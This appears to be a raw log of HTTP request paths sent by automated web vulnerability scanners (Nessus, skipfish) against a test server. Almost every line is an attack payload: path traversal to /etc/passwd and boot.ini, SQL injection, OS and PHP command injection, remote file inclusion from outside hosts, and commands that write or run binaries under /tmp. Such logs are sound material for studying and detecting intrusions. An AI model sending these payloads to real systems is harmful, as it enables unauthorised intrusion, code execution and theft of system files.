/phpmyadmin/sendtemp.pl?templ=../../../../../etc/passwd /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=ftr8qa709ryjzezou /main.php?logout=ver\x0b>q96553915&rem\x0b /examples/jsp/sessions/index.php?entry=' /miz4r5hz.x? /examples/jsp/sessions/remindpasswd /scripts/download.php?language=/etc/passwd\x00 /rpxyx07v.cfc? /egaet53a.htm? /search.jsp?q=%" / /scripts/lrn28issfuqi.php3 /script_viruses/ /vac1l5vm.kspx? /javascript/xls.exe /javascript/copies.exe /cgi-perl/a1stats/a1disp3.cgi?../../../../../../../etc/passwd /examples/jsp/jsp2/el/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\x00 /recordings/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\x00 /bmeun223.nsf? /main.php?frm_daynight=day&frm_passwd=q35722364&frm_referer=http%3a//192.168.28.202/main.php%3fstuff%3d1985387140&frm_user=&scr_height=&scr_width= /examples/jsp/checkbox/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl /h5sc3gxy.fts? /include/error/autherror.cfm?errorcode=1&ftvar_linkp="> /scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 920699051-- /ap58k3ci.htm? /main.php?logout="rm,q64292722&rem, /jw64yq8u.dll? /scripts/starnet/addons/slideshow_full.php?album_name='1810978145 /javascript/smtp.exe /admin/index.php?act=login&username=' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus /main.php?stuff="\x0arm\x09q74494385\x09# /en-us/account/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd /examples/jsp/colors/search= /cacti/misc/audio.php?recording=../version.inc /cacti/php.cgi?/etc/passwd /eei78ore.dll? /script/plugins/phpgacl/admin/index.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp? /abouttrialsubscription/ /subscriptions.sfish /../.tar.bz2 /examples/jsp/colors/index.php?id=urjhxcl19w' /cgi-bin/www/delivery/ac.php?bannerid=-1332009302+or+1=1+--+';passthru(base64_decode($_server[http_nessus_zvt2swpn]));die;/* /examples/jsp/num/quickstore.cgi?page=../../../../../../../../../../etc/passwd\x00html&cart_id= /main.php?stuff='\x0drm q65565224 # /phpmyadmin/documentation.html?phpmyadmin=../../../../../../../etc /javascript/sample.exe /zqqemp6j.x? /gvx7m5ti.pl? /report.php?scriptpath=http://192.168.202.118:8080/tzhfyzkbomspvm?? /examples/jsp/jsp2/jspx/newsdesk.cgi?t=../../../../../../etc/passwd /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332010397,0x3a,1301577513),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 /.asp /scripts/tinfo.php?id=1331908710 /hipkz026.aspx? /h21y8w52.dll? /manager/ion-p.exe?page=../../../../../etc/passwd /javascript/properties.exe /scripts/.wwwacl /h4bi26jd.cgi? /mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=http://192.168.202.96:8080/4dckqcc0acprbz? /main.php?logout='uname # /examples/jsp/jsp2/el/myevent.php?myevent_path=/etc/passwd\x00 /opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.118:8080/iroy1gvqrrqu?\x00 /examples/jsp/jsp2/el/bb_func_txt.php?pathtofiles=/etc/passwd\x00 /main.php?stuff=';sleep 10 # /8t9v8k7x.html? /faq.php?cat_id=1' or force_mysql_error='2 /examples/jsp/sessions/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1 /i2n4v4rl.php3? /script_path/cms/classes/openengine/filepool.php?oe_classpath=http://192.168.202.118:8080/moclyxlwqyfjnp?? /scripts/api/orders.json?search[instance_eval]=kernel.fail `id` /examples/servlets/servlet/index.php?search= /fastscripts-23/ /javascript/python.exe /stat/awstatstotals.php?sort="].passthru('id').exit().$a[" /qhvu0pdg.cfm? /examples/jsp/jsp2/jspx/themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00 /paged'accueil/ /manager/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd|| /phpmyadmin/documentation.html?"=1 /main.php?logout="\x0ddel q11745557 # /examples/jsp/jsp2/el/item.fts?href=">; /eei78ore.aspx? /texis.exe/nessus /examples/jsp/checkbox/texis.exe/nessus /hjdzm96v.cgi? /examples/jsp/num/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&" /webdav/c99.php?act=f&f=wce.exe&ft=info&d=c:\ /a0imiuf1.mscgi? /en-us/esmozg5d.exe? /cgi-bin/rguest.exe /class-pangofontdescription/ /ht8pn8uq.cfc? /htbin/gw5/gwweb.exe?htmlver=aaa&get-context /phpmyadmin/detail.asp?nchannel='1 /people's republic of china/ /scripts_livecontent/ /cgi-perl/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html /scripts/index.php?edit=nonexistant1374561915 /cgi-bin/data/fetch.php?page=' /en-us/33y9gcqq.pl? /gy23xnjq.kspx? /script/template/index.php?main_page_directory=http://192.168.202.118:8080/tzhfyzkbomspvm? /syshelp/cscript/showfnc.stm?pkg= /en-us/ /index.php?id=urjhxcl19w' /scripts/ /cactisearch_results.dot?search_query=nessus">/ /main.php?stuff="ping;-w;8000;-n;1;1.2.3.4|rem; /mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd /javascript/80.exe /main.php?stuff="ver\x0c>q43448647&rem\x0c /shell script gui/ /en-us/h5sc3gxy.cgi? /cacti/sendtemp.pl?templ=../../../../../etc/passwd /manager/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id /main.php?frm_daynight=day&frm_passwd=q71856358&frm_referer=http%3a//192.168.24.202/main.php%3fstuff%3d1583574484&frm_user=&scr_height=&scr_width= /main.php?stuff="&del\x0bq12538123&rem\x0b /javascript/action.exe /examples/jsp/jsp2/jspx/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1 /raanw4ia.jsp? /order/login.php?svr_rootscript=http://192.168.202.118:8080/2aibfaczmac8? / /help.php?q=&ping;-w;10000;-n;1;4.3.2.1&rem; //%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd /apavxugx.x? /main.php?stuff=&rm;q39916466&rem; /1r8cfrlf.x? /main.php?stuff=;sleep\x099\x09# /qhvu0pdg.asp? /javascript/patch.exe /en-us/esmozg5d.kspx? /web_scripts/ /javascript/wbboard.exe /examples/jsp/cal/profil.php?id=1 /phpmyadmin/js/scripts.php?load=/etc/passwd\x00 /javascript/sysuser.exe /scripts/fileseek2.cgi?foot=&head=;cat /etc/passwd| /ows-bin/texis.exe/junk /examples/jsp/jsp2/el/supporter/tupdate.php?groupid=change&sg=' /examples/jsp/colors/mmstdod.cgi?alternate_templates=| echo "content-type: text/html";echo "" ; id\x00 /opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\x00 /d765w06j.idc? /postscripttutorial/ /main.php?stuff="ping\x0c-w\x0c9000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c /cgi-bin/search.jsp?q=%" /javascript/ico.exe /script/gestion/index.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm? /mv8wxfy9.htm? /forum1_professionnel.asp?n=1771&nn=100&page=`/etc/passwd` /fpnpp5zg.cfc? /examples/servlets/servlet/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd /en-us/account/direct.php?rf=/etc/passwd\x00 /examples/jsp/checkbox/search.cgi?..\..\..\..\..\..\winnt\win.ini /examples/jsp/jsp2/jspx/minis.php?month=../../../../../../etc/passwd /examples/jsp/jsp2/el/config.php?path[docroot]=/etc/passwd\x00 /iv5vkgam.cgi? /cgi-bin/login.php?course="> /top.php?stuff="del q95826835 # /examples/jsp/colors/language.php?data_dir=/etc/passwd\x00 /scripts/repost.asp /examples/jsp/sessions/cgi/tseekdir.cgi?location=/etc/passwd\x00 /examples/jsp/checkbox/download.php?language=/etc/passwd\x00 /amdahl's_law/ /subscriptions /scripts/index.php?show=../../../../../../../../../../../etc/passwd\x00 /subscription_mag2/ /examples/jsp/sessions/htsearch?exclude=`/etc/passwd` /dda2qr7j.jsp? /reinventing_"ids"/ /rubrique.asp?no=/etc/passwd\x00|55|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'/'. /popup.php?include_path=/etc/passwd\x00 /show_archives.php?template=../../../../../../../../../../etc/passwd\x00 /examples/jsp/jsp2/jspx/auktion.cgi?menue=../../../../../../../../../etc/passwd /fo564rei.cfm? /miz4r5hz.cfm? /"lindsay lohan"/ // /scripts/list.php /javascript/vol.exe /awstats/awstats.pl?migrate=|echo;/./tmp/ysooqnjtxq0 > /dev/null &;echo|awstats987387.txt /bzuf9ozq.jsp? /en-us/h5sc3gxy.htm? /0u75ldxq.cfm? /help.php?q="&ver\x0c>q57632929&rem\x0c /bxnyrhmh.asp? /tukodz3j.aspx? /javascript/legacy.exe /examples/jsp/sessions/search/results.stm?indexname=>">&style=fancy&spage=60&query=folder name /6n7aacgg.html? /cgi-bin/db4web_c/dbdirname//etc/passwd /javascript/sites.exe /scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1332010419,4,5 /help.php?q="del,q11574297&rem, /help.php?q=&ver >q76744966&rem /scs86g1p.mscgi? /x7pclv4s.x? /9o6g5vkn.nsf? /examples/jsp/cal/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl /examples/jsp/jsp2/jspx/faxsurvey?cat /etc/passwd /i686v90l.x? /recordings/adlayer.php?layerstyle=../../../../../../../etc/passwd\x00 /scripts/gm.cgi /scripts/2pwudii1mt22.sh /cgi-sys/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /main.php?stuff='\x0dsleep\x098\x09# /en-us/33y9gcqq.nsf? /javascript/sun.exe /top.php?stuff="\x0adel\x09q69986769\x09# /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/rvckwz6smkqf.inc /cgi-home/gw5/gwweb.exe?htmlver=aaa&get-context /examples/jsp/sessions/install.php?newlang=../../cpg_error.log\x00 / /examples/jsp/jsp2/jspx/calendar.php?serverpath=/etc/passwd\x00 /nyvbv05h.asp? /main.php?logout="ping\xa0-w\xa07000\xa0-n\xa01\xa01.2.3.4|rem\xa0 /javascript/notes.exe /en-us/jnv890lt.asp? /javascript/whosonline.exe /main.php?logout="ping -w 10000 -n 1 1.2.3.4|rem /pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd /macro toolsworks advanced scripting edition v6/ /xsqln7eb.exe? /jw64yq8u.html? /en-us/odzk29aa.asp? /help.php?q="\x0adel\x09q43182957\x09# /vgn/login/1,501,,00.html?cookiename=x--\> /top.php?stuff='&del\x09q76725442\x09# /examples/jsp/error/notify?from=nessus"|id" /top.php?stuff="&ping,-w,11000,-n,1,1.2.3.4&rem, /javascript/prop.exe /script/fckeditor/editor/dialog/fck_link.html /o6ebbirj.aspx? /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php&frm_user=q11158979&scr_height=&scr_width= /php scripts pack 2 by www/ /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../../../../../../../../../../..//boot.ini\x00 /nyjgaorz.cfm? /help.php?q="ver >q43721567&rem /main.php?logout="rm\x09q86373985&rem\x09 /d7ktpmcq.php3? /examples/jsp/num/search.jsp?q=%" /main.php?logout="|ping\x09-w\x099000\x09-n\x091\x094.3.2.1|rem\x09 /gy23xnjq.asp? /esmozg5d.htm? /cmbpm script v2/ /7u1pb2xi.jsp? /servlet/org.apache.catalina.containerservlet/ /javascript/admin.exe /javascript/received.exe /cacti/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd /search.jsp?q=%" /weq93ppb.asp? /scripts/fgos1sb1c1tr.inc /fmnveedu.jspa? /zv8tv7h8.cfm? /n9xlumt5.cfc? /subscriptions.bak /help.php?q='uname >q38575663 # /cgi-home/gw5/gwweb.exe?help=bad-request /uc3w3bdi.fts? /gvx7m5ti.kspx? /search.jsp?q=%" /javascript/amazon.exe /en-us/ddoworrl.php3? /u95h6ymu.exe? /top.php?stuff="\x0ddel q75872817 # /scripts/tinfo.php?id=1332010394 /main.php?logout=';uname >q59144751 # /8x6w469u.php3? \\../../../../boot.ini% ../ /top.php?stuff="&ping -w 9000 -n 1 1.2.3.4&rem /forum_professionnel.asp?n=`/etc/passwd`|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'`'. /phpmyadmin/.passwd // /javascript/footers.exe /apavxugx.asp? /en-us/n9xlumt5.kspx? /examples/jsp/jsp2/el/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /examples/jsp/colors/shoutbox.php?conf=../ /examples/jsp/error/lib/authform.inc.php?path_pre=/etc/passwd\x00 /examples/jsp/jsp2/jspx/index.php?name=your account&profile=anyone"> /javascript/msft.exe /g3w7y7u5.htm? /bin/view_item?html_file=../../../../../../../../../../etc/passwd\x00 /help.php?q="&del;q83399542&rem; /sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id /scripts/secure/dashboard.jspa /fnwhrxyd.php3? /final isp position description/ /top.php?stuff="\x0dsleep\x0911\x09# /i2n4v4rl.jsp? /en-us/account/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00 /help.php?q=";uname >q19897274 # /javascript/.htpasswd.sfish/`true` /index.php?id='union/**/select/**/0,0,1037776575,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=q63867595 /javascript/.passwd.xls /scripts/index.php?id='union/**/select/**/0,0,907033072,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /examples/jsp/jsp2/el/sources/functions.php?root_path=/etc/passwd\x00 /top.php?stuff="uname\x09>q89765477\x09# /examples/jsp/error/catalog.php?action=category_show&id=' /d765w06j.htm? /top.php?stuff="&del\x0bq26467745&rem\x0b /en-us/h5sc3gxy.kspx? /search.php?allwords=
&cid=0&title=1&desc=1 /scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file¤tfolder=/fckeditor_currentfolder_file_upload-1331909442.php. /zuihld5m.aspx? /w4996nr0.cfm? /examples/jsp/cal/man-cgi?section=0&topic=ls;id /help.php?q=\x0duname\x09>q95281946\x09# /cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331908727 /recordings/mapserv.exe?map=mapserver_detect.nasl.map /index.php?req=submit=submit /cgi-bin/msmmask.exe /h4bi26jd.jspa? /qhvu0pdg.pl? /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/ysytjpdzlh0;'); function v /j4oqyvga.kspx? /examples/jsp/error/search.jsp?q=%" /mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosconfig_absolute_path=http://192.168.202.118:8080/ghl9il? /main.php?stuff="&rm,q14633268&rem, /examples/jsp/checkbox/sojourn.cgi?cat=../../../../../etc/passwd\x00 /examples/jsp/error/nessus">/ /iissamples/issamples/winmsdp.exe /phpmyadmin/install.php?newlang=../../cpg_error.log\x00 /scripts/search.scr.php?globals[pth][classes]=@rfiurl?globals[pth][classes]=@rfiurl? /manager/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\x00 /examples/jsp/jsp2/elsearch-results.dot?search_query=nessus">/ /prescriptionrefill/ /main.php?stuff="uname\x09# /it won't be christmas without you/ /cgi-win/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go /javascript/multimedia.exe /cgi-bin/index.php?id='union/**/select/**/0,0,1409137117,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /scripts/ui/login?user=nessus-1331918954 /main.php?logout="ver >q61955456&rem /ewc3rz1l.html? /help.php?q="\x0arm\x09q43182957\x09# /scripts/vhost.php?action=logout&time=1332010196 /cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,261058722,0,0,0,0,0-- /examples/jsp/jsp2/jspx/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\x00 /h21y8w52.x? /cgi-bin/.cobalt/alert/service.cgi?service= /scripts/wd7crx47eaml.html /bl8sefdm.php? /examples/jsp/error/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl /escript_examples/ /cacti/language.php?data_dir=/etc/passwd\x00 /help.php?q="\x0adel q34395972 # /antispam/listdel?file=blacklist&name=b&startline=0 /l4fz1dqw.mscgi? /examples/jsp/cal/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13-- /jw64yq8u.pl? /examples/jsp/num/jgs_portal_statistik.php?meinaction=themen&month=1&year=1' /cgi-bin/index.php?id=823dwrvmfh' /..\..\..\..\..\..\..\..\..\..\boot.ini /r3le3om5.jspa? /apavxugx.aspx? /javascript/document.lib /javascript/htdoc.exe /passwd_files/ //

/help.php?q=;sleep 11 # /cgi_bin/listrec.pl?app=qmh-news&template=;ls /etc| /en-us/ /job_description/ /javascript/fetch.exe /scgi-bin/windmail.exe /scripts/home/search.asp?nchannel='1 /mv8wxfy9.exe? /examples/jsp/jsp2/el/main.php?g2_itemid=../../../../../license\x00 /submitscript/ /1r8cfrlf.cfc? /examples/jsp/jsp2/el/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00| /jw64yq8u.jspa? /examples/jsp/jsp2/jspx/search.cgi?..\..\..\..\..\..\windows\win.ini /error/\..\..\..\..\winnt\win.ini /top.php?stuff=";sleep 10 # /../.sln /scripts-util/ /help.php?q='\x0adel q22265597 # /scripts/rpc.php?cmd=display_get_requesters&id=1 /o6ebbirj.jsp? /en-us/account/index.php?template=../../../loudblog/custom/config.php\x00 /fcgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00 /scripts/gw5/gwweb.exe?help=bad-request /javascript/maven.exe /main.php?stuff=rm;q53449996&rem; /carisoprodol-script/ /viewpage.php?file=/etc/passwd /o6ebbirj.exe? /examples/jsp/sessions/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\x00 /scripts/admin.pl?path=bin/mozilla&action=list_users /i686v90l.aspx? /phpmyadmin/forum_2.php?msg=10&return= /help.php?q="|ping\x0c-w\x0c9000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c /scripts/main.cgi?board=free_board&command=down_load&filename=/../../../../../../../../etc/passwd /../.sql /ghswfouu.html? /scripts/cleartrust/ct_logon.asp?ctloginerrormsg= /manager/viewpage.php?file=/etc/passwd /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+61+c3+60+52+53+33+c0+e8+0a+00+00+00+5b+5a+03+d8+2b+d0+75+ef+61+c3++>>esbq /main.php?stuff="|ping\x0c-w\x0c8000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c /javascript/shadow.exe /examples/jsp/cal/remindpasswd /technology-description/ /index.php?op=default&date=200607' union select 1,898491611,1,1,1,1,1,1,1,1--&blogid=1 /recordings/resetpw.php?email=../../../../../../../../../../../../etc/passwd /gvx7m5ti.mscgi? /ju0u7kfo.mscgi? /examples/jsp/cal/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- /examples/servlets/servlet/texis.exe/?-dump /examples/servlets/servlet/index.php?_language=../../../../../../../../../../etc/passwd\x00 /top.php?stuff=ver >q22882938&rem /opensiteadmin/scripts/classes/form.php?path=http://192.168.202.118:8080/2aibfaczmac8?\x00 /ewc3rz1l.mscgi? /tuwjta1w.php3? /en-us/account/file.php?path=/etc/passwd\x00 /examples/jsp/jsp2/el/search/show.pl?url=file:/etc/passwd /help.php?q="del,q74835818&rem, /javascript/modify.exe /hrttz9fj.nsf? /index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332008329',null,null,null,null -- /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/xvvpghsokp0+>+/dev/null+&')."]=1 /top.php?stuff="\x0asleep 11 # /cacti/admin/index.php?act=login&username=' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus /h5sc3gxy.cgi? /o35zot2r.x? /include/scripts/send_email_cache.php?dir=http://192.168.202.118:8080/ghl9il? /help.php?q=;rm q31144684 # /index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332010400','5'-- /examples/jsp/num/phptonuke.php?filnavn=/etc/passwd /top.php?stuff="&ver&rem\x0c /d44uk9h2.x? /admin-serv/tasks/configuration/viewlog?file=passwd&num=5000&str=&directories=admin-serv/logs/../../../../../../etc&id=admin-serv /cacti/listrec.pl?app=qmh-news&template=;ls /etc| / /j4oqyvga.mscgi? /examples/jsp/colors/calendar_admin.pl?config=|cat /etc/passwd| /8x6w469u.pl? /help.php?q='\x0ddel q49373567 # /cgi-bin/gw5/gwweb.exe?htmlver=aaa&get-context /u8yiqilu.jsp? /javascript/computer.exe /help.php?q="|ping,-w,9000,-n,1,4.3.2.1|rem, /index.php?dir= /top.php?stuff=';uname\x09# /help.php?q='\x0ddel\x09q63353886\x09# /d5a5renl.aspx? /ju0u7kfo.cfm? /kb.php?category_id=xxl> /help.php?q="ping\xa0-w\xa011000\xa0-n\xa01\xa01.2.3.4|rem\xa0 /main.php?stuff="uname\x09>q91227717\x09# /examples/jsp/sessions/download.php?language=/etc/passwd\x00 /confirmunsubscription.php?output=http://192.168.202.118:8080/ghl9il? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+6f+61+64+4c+69+62+72+61+72+79+41+00+00+00+00+47+65+74+50+72+6f+63+41+64+64++>>esbq /ao22ww7y.cfc? /index.php?in=song&term=&action=search&start=0 /top.php?stuff="\x0auname # /jackrabbit/search.jsp?q=%" /index.php?id='union/**/select/**/0,0,2115200900,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /ows-bin/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf /cgi-sys/r.cgi?file=../../../../../../../../../../etc/passwd /0rufe52p.jsp? /scripts/starnet/addons/slideshow_full.php?album_name='648730541 /cgi-914/.passwd /cgi-local/fileseek.cgi?foot=&head=;cat /etc/passwd| /main.php?stuff="ping\xa0-w\xa010000\xa0-n\xa01\xa04.3.2.1|rem\xa0 /scripts/news.scr.php?globals[pth][classes]=@rfiurl?globals[pth][classes]=@rfiurl? /scripts/b0j2ijssh6cu.cfm /servlet/msgpage?action=test&msg= /bin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /javascript/htpasswd.cfg /examples/jsp/num/search/results.stm?indexname=>">&style=fancy&spage=60&query=folder name /top.php?stuff=';rm\x09q97745414\x09# /examples/jsp/checkbox/install.php?newlang=../../cpg_error.log\x00 /help.php?q="del q26428197&rem /6wb70v0b.aspx? /top.php?stuff="del\x09q67284925&rem\x09 /edittag/edittag.cgi?file=/../../../../../etc/passwd /examples/jsp/jsp2/el/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl /phpmyadmin/store.cgi?startid=../../../../../../../../../etc/passwd\x00.html /scripts/t769qwej0llr.pl /scripts/nx/common/cds/menu.inc.php?c_path=http://xxxxxxxx/ /promo-transcript7/ /javascript/removals.exe /mpcgi/fileseek.cgi?foot=&head=;cat /etc/passwd| /quagynka.aspx? /main.php?logout="ping;-w;7000;-n;1;1.2.3.4|rem; /examples/jsp/cal/cgiwrap/cgiwrap_error_page_handling_xss.nasl /javascript/.passwd.class /cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.96:8080/frznctvhi0i5?? /jdx255ea.nsf? /? /help.php?q="\x0ddel\x09q76412123\x09# /examples/servlets/servlet/help/index.php?help_file=../../../../../../../../../../../etc/passwd /o35zot2r.fts? /sysuser/docmgr/htaccess.stm?path= /cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\x00 /n9xlumt5.htm? /help.php?q="ping,-w,11000,-n,1,4.3.2.1&rem, /metranscript/ /fa8p8lr8.nsf? /examples/servlets/servlet/themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00 /examples/jsp/cal/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini /? /hosting-scripts/ /jackin' pop/ /ygkjkngd.cfm? /main.php?stuff="&uname >q23549573 # /cgis/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|' /_vti_bin/_vti_adm/admin.exe /javascript/htpasswd.rb /main.php?logout=';rm q59144751 # /en-us/account/lib/dbman_filter.inc.php?lib_path=/etc/passwd\x00 /byrg33fw.aspx? /javascript/.passwd.sh /l13b77e5.pl? /d44uk9h2.aspx? /scripts/session/login.php /top.php?stuff='\x0drm\x09q15742122\x09# /help.php?q="ver,>q69289112&rem, /javascript/close.exe / /dailies biblical scripture v1/ /viagra-prescriptions/ /y8pmygrp.jspa? /vmi8bb12.cfc? /h21y8w52.htm? /news/include/createdb.php?langfile;=http://cirt.net/rfiinc.txt?? /javascript/.passwd.key /archive.php?scriptpath=http://192.168.202.96:8080/swgnhpydbq0t?? /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /606wkcop.htm? /mv8wxfy9.idc? /cacti/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\x00 /manager/print.php?what=article&id=' /cgi-exe/gw5/gwweb.exe?htmlver=aaa&get-context /examples/jsp/jsp2/jspx/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00 /cgi-bin/index.php?id=kis0atfdu6' /scripts/test-cgi?/* /quagynka.htm? /javascript/fabric.exe /help.php?q="ping\x09-w\x099000\x09-n\x091\x094.3.2.1&rem\x09 /scripts/k0pxpjgnimox.html /top.php?stuff="\x0duname\x09>q41641295\x09# /eg2u8pbv.mscgi? /6wb70v0b.idc? /scripts/yfmo7jpwvpv1.php3 /169okeyj.asp? /javascript/.htaccess.sfish/'`uname`' /scheme-description/ /scripts/eezuu7xc7ge3.cgi /6wb70v0b.dll? /examples/servlets/servlet/bb_func_txt.php?pathtofiles=/etc/passwd\x00 /scripts/texis.exe/junk /fc9t54l7.idc? /main.php?logout='\x0dsleep\x099\x09# /forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../../../../../../../../../../../boot.ini /t3af3tdz.html? /m2fpztty.aspx? /top.php?stuff='uname # /scripts/wd7crx47eaml.sh /examples/jsp/colors/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /javascript/document.cpp /scripts/vzdybnanqpc3.pl /examples/jsp/jsp2/jspx/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd /bxnyrhmh.cgi? /code/inc_header.php?gtopnombre="> /en-us/33y9gcqq.cgi? /zln2hm2z.dll? /examples/jsp/colors/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id /igtf0zon.php? /ovcgi/ovalarm.exe?ovabverbose=1 /en-us/fo564rei.php3? /vmi8bb12.fts? /examples/jsp/checkbox/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\x00 /eg2u8pbv.html? /en-us/ddoworrl.htm? /zuihld5m.mscgi? /l13b77e5.mscgi? /javascript/iisadmin.exe /cgi-bin/htgrep?file=index.html&hdr=/etc/passwd /htbin/r.cgi?file=../../../../../../../../../../etc/passwd /examples/jsp/colors/javascript.php?abs_path=/etc/passwd\x00 /subscriptions.log /recordings/index.php?search= /cgi-exe/a1disp3.cgi?../../../../../../../../../../etc/passwd /main.php?logout=ping;-w;11000;-n;1;1.2.3.4&rem; / /miz4r5hz.cfc? /examples/jsp/jsp2/el/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /news/include/createdb.php?langfile;=http://192.168.202.118:8080/ghl9il?? /1qwv2p5p.asp? /phpmyadmin/documentation.html?phpmyadmin=1' /examples/jsp/colors/welcome.php?custom_welcome_page=/etc/passwd\x00 /en-us/dda2qr7j.html? /examples/jsp/sessions/add_url.htm?node= /domainfiles/*//../../../../../../../../../../etc/passwd /bl8sefdm.jsp? /j2kdmfw4.nsf? /include/scripts/export_batch.inc.php?dir=http://192.168.202.118:8080/tzhfyzkbomspvm? /phpmyadmin/documentation.html?phpmyadmin=/\../\../\../\../\../\../\../etc/passwd /javascript/ini.exe /examples/jsp/num/index.php?show=../../../../../../../../../../../etc/passwd\x00 /awstats/awstats.pl?migrate=|echo;/bin/echo -en "\0174\0044\0000\0377\0347" >> /tmp/vsnlklmgzu0;echo|awstats235001.txt /scripts/1331909165-ror_session_fixation.nasl /help.php?q="\x0adel q73214822 # /javascript/document.inc /cgi-bin/20review.asp?productcode=' /b4vng02k.jsp? /examples/jsp/sessions/index.php?sensor_program= /gy23xnjq.x? /en-us/esmozg5d.mscgi? /phpmyadmin/documentation.html?phpmyadmin=">'>'" /phpmyadmin/main.cgi?board=free_board&command=down_load&filename=/../../../../../../../../etc/passwd /phpmyadmin/admin/admin.php?sid=0' /../../../../winnt/repair/sam._ /cgi-bin/cart.pl?db=' /ows-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd /scripts/browse_blogs.php 